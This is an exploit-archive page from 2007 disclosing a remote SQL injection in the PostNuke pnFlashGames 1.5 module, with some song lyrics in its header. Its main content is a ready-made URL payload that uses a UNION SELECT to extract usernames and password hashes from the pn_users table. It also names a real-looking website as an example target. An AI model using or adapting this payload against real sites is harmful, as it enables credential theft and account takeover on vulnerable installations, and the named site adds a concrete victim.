[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PostNuke pnFlashGames Module 1.5 Remote SQL Injection Vulnerability
# Published : 2007-04-28
# Author : xoron
# Previous Title : The Merchant <= 2.2.0 (index.php show) Remote File Inclusion Exploit
# Next Title : burnCMS <= 0.2 (root) Remote File Inclusion Vulnerabilities
============================================================
PostNuke pnFlashGames Module v1.5 REmote SQL Injection
============================================================
Bulan: xoron
xoron.biz
+
Love's the funeral of hearts
The funeral of hearts
And a plea for mercy
When love is a gun
Separating me from you
:(
============================================================
Exploit:
index.php?module=pnFlashGames&func=view&cid=-1/**/union/**/select/**/0,pn_uname,2,pn_pass,4,5,6,7,8,9,10,11,12,13/**/from/**/pn_users/**/where/**/pn_uid=2/*
============================================================
Example: http://andersonvision.com/PostNuke/
============================================================
# www.Syue.com [2007-04-28]